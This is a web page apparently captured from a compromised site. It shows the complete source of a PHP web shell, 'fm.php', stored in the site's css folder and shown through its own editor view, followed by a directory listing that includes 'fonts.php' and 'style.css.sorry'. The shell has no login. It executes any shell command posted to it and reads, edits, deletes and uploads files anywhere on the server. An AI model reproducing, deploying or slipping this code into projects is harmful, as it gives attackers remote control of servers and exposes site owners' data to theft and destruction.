Edit: /home/ratkomit/public_html/css/fm.php
<?php /* Minimal PHP File Manager */ $pwd=realpath(isset($_GET['d'])?$_GET['d']:'.'); $root=realpath('/'); if(strpos($pwd,$root)!==0) $pwd=$root; echo '<!doctype html><html><head><meta charset=utf-8><title>FM</title><style>body{font-family:monospace;margin:20px;background:#111;color:#0f0}a{color:#0ff}th{text-align:left}table{width:100%}td{border-bottom:1px solid #333;padding:4px}tr:hover{background:#222}pre{background:#000;padding:10px;overflow:auto}input,textarea{background:#222;color:#0f0;border:1px solid #0f0;padding:5px}</style></head><body>'; if(isset($_GET['c'])){echo '<h3>CMD</h3><form method=post action="?c=1&d='.urlencode($pwd).'"><input type=text name=cmd size=80 autofocus><input type=submit value=Exec></form>';if(isset($_POST['cmd'])){echo '<pre>';system($_POST['cmd'].' 2>&1');echo '</pre>';}} if(isset($_GET['edit'])){$f=realpath($_GET['edit']);if(strpos($f,$root)===0){echo '<h3>Edit: '.htmlspecialchars($f).'</h3><form method=post action="?edit='.urlencode($f).'&d='.urlencode($pwd).'"><textarea name=content rows=30 cols=120>'.htmlspecialchars(file_get_contents($f)).'</textarea><br><input type=submit value=Save></form>';if(isset($_POST['content'])){file_put_contents($f,$_POST['content']);echo '<b>Saved</b>';}}} if(isset($_GET['view'])){$f=realpath($_GET['view']);if(strpos($f,$root)===0) echo '<h3>'.htmlspecialchars($f).'</h3><pre>'.htmlspecialchars(file_get_contents($f)).'</pre>';} if(isset($_GET['del'])){$f=realpath($_GET['del']);if(strpos($f,$root)===0 && is_file($f)){unlink($f);echo '<b>Deleted</b> ';}} if(isset($_FILES['up'])){$t=$_FILES['up']['tmp_name'];$n=basename($_FILES['up']['name']);move_uploaded_file($t,$pwd.'/'.$n);echo '<b>Uploaded '.$n.'</b> ';} echo '<h3>'.htmlspecialchars($pwd).'</h3>'; echo '<form method=post enctype=multipart/form-data action="?d='.urlencode($pwd).'"><input type=file name=up><input type=submit value=Upload></form>'; echo '<a href="?d='.urlencode(dirname($pwd)).'">[UP]</a> <a href="?c=1&d='.urlencode($pwd).'">[CMD]</a>'; echo '<table><tr><th>Name</th><th>Size</th><th>Perm</th><th>Action</th></tr>'; foreach(scandir($pwd) as $n){if($n==='.') continue;$p=$pwd.'/'.$n;$s=is_dir($p)?'DIR':filesize($p);$m=substr(sprintf('%o',fileperms($p)),-4);echo '<tr><td>'.(is_dir($p)?'<a href="?d='.urlencode($p).'">'.$n.'/</a>':$n).'</td><td>'.$s.'</td><td>'.$m.'</td><td><a href="?view='.urlencode($p).'&d='.urlencode($pwd).'">V</a> <a href="?edit='.urlencode($p).'&d='.urlencode($pwd).'">E</a> <a href="?del='.urlencode($p).'&d='.urlencode($pwd).'" onclick="return confirm(\'Del?\')">D</a></td></tr>';} echo '</table></body></html>'; ?>
/home/ratkomit/public_html/css
[UP]
[CMD]
Name
Size
Perm
Action
../
DIR
0750
V
E
D
.DS_Store
6148
0644
V
E
D
README.md
404
0644
V
E
D
fm.php
2604
0644
V
E
D
fonts.php
4024
0644
V
E
D
style.css.sorry
5824
0644
V
E
D